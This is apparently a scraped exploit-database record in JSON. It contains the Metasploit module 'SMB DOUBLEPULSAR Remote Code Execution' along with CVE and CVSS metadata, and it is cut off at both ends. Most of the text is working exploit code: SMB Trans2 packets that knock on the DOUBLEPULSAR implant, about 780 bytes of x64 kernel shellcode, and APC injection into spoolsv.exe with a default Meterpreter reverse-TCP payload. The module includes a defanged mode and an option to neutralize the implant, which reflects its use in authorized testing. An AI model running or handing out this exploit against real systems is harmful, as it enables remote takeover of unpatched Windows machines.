pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-08] #"}, "lastseen": "2021-09-07T22:13:30", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "b109bcf64022fba766803673f4ffd6bf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T22:11:20", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-08T22:11:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T22:11:20", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n 